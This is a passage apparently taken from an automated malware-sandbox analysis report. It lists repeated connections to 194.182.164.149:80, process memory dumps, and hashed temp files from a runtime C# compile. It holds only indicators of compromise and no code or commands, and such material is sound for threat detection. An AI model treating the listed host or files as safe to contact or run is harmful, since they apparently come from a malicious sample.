| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
Files
memory/4856-1-0x00007FFB0CA0D000-0x00007FFB0CA0E000-memory.dmp
memory/4856-0-0x00007FFACC9F0000-0x00007FFACCA00000-memory.dmp
memory/4856-4-0x00007FFACC9F0000-0x00007FFACCA00000-memory.dmp
memory/4856-3-0x00007FFACC9F0000-0x00007FFACCA00000-memory.dmp
memory/4856-2-0x00007FFACC9F0000-0x00007FFACCA00000-memory.dmp
memory/4856-6-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp
memory/4856-5-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp
memory/4856-11-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp
memory/4856-14-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp
memory/4856-12-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp
memory/4856-15-0x00007FFACA700000-0x00007FFACA710000-memory.dmp
memory/4856-13-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp
memory/4856-10-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp
memory/4856-16-0x00007FFACA700000-0x00007FFACA710000-memory.dmp
memory/4856-9-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp
memory/4856-8-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp
memory/4856-7-0x00007FFACC9F0000-0x00007FFACCA00000-memory.dmp
memory/4856-20-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp
memory/4856-21-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp
memory/1392-31-0x00000288E8F80000-0x00000288E8FA2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f5y1uafs.5jd.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
\??\c:\Users\Admin\AppData\Local\Temp\gpu5lrdn\gpu5lrdn.cmdline
| MD5 | bf7a23ae380a2989227f1cd81551a9df |
| SHA1 | 58b035db61fc9332cc418366ea92be6e449b18a8 |
| SHA256 | c804df039626b6a55072c7e5d696465beb5a9a7c9450f864e1921c984598800e |
| SHA512 | c73f822a2c78a870191f34ccab869423e98e8b65bb74645728a083aa217930d8a30c46261203225e222c871fdb76789c27ecfcf81d8fd4f42f2312b9f22b7cdb |
\??\c:\Users\Admin\AppData\Local\Temp\gpu5lrdn\gpu5lrdn.0.cs
| MD5 | f4dd5c682eb7b3b679f084261bfc7c4c |
| SHA1 | 70f75d7a4e42c185eb09139ed3c6f7338a2219c2 |
| SHA256 | 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319 |
| SHA512 | 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d |
\??\c:\Users\Admin\AppData\Local\Temp\gpu5lrdn\CSCC14A741FB0A34AB68F6F7ABD8FE589A5.TMP
| MD5 | 3338efe0078703733de2f1499416617f |
| SHA1 | 7ec04e088fd0212f5b19d0d7408023f519e9317a |
| SHA256 | 73ccae6e368e3dd2b2bb15bafd744b50788a788aff2feb9367895a030e9358c8 |
| SHA512 | 0af44bfb396af3ffa0eaa96c0cbf0cd7bdaca38c9a693f98399fb8b1a20192a96a2717eacf89c6e4dea88b99a2ae586d22f3d4a0424a070844cf023cf790c29e |
C:\Users\Admin\AppData\Local\Temp\RES6590.tmp
| MD5 | 494d1acd6abfafc66792f5e620650eb8 |
| SHA1 | f8785660b072b91514ba5125428edbd3f48541d2 |
| SHA256 | 3f608c492f0a35791c6a56c157144693e0e06586451f43d4b136c81b172186ca |
| SHA512 | b7ef326967a99c0d9e9f8d95c038898b4040cf8e4db70b6161dff5d6f7b0265e7ded74571f03391c513855c16c071e92f4d1973e445c87dc638c028eaa9412de |
C:\Users\Admin\AppData\Local\Temp\gpu5lrdn\gpu5lrdn.dll
| MD5 | d284f184b933aea97028ef51bd305328 |
| SHA1 | 49b50195c2e37b14e3972ee20d433922ba157800 |
| SHA256 | 9ddcc6106dcb6032320965c3d2052df9842bec909f9ccba4bbc0931bdeff7acd |
| SHA512 | 17d5d007983e2c56c874b0f934863569ea6af6c9847a94225a84895330c4263c899465e2bdfdfe929fbbed781883a565f95a88490fdd521b0d0d7149433a5ebb |
memory/1392-56-0x00000288E91D0000-0x00000288E91D8000-memory.dmp
memory/1392-60-0x00000288E99C0000-0x00000288EA43E000-memory.dmp
memory/1392-62-0x00000288EAEC0000-0x00000288EB9A6000-memory.dmp
memory/1392-63-0x00000288EAEC0000-0x00000288EB9A6000-memory.dmp
memory/1392-61-0x00000288EAEC0000-0x00000288EB9A6000-memory.dmp
memory/1392-64-0x00000288EAEC0000-0x00000288EB9A6000-memory.dmp
memory/4856-65-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp
memory/4856-66-0x00007FFB0CA0D000-0x00007FFB0CA0E000-memory.dmp
memory/4856-67-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp
memory/1392-74-0x00000288EAEC0000-0x00000288EB9A6000-memory.dmp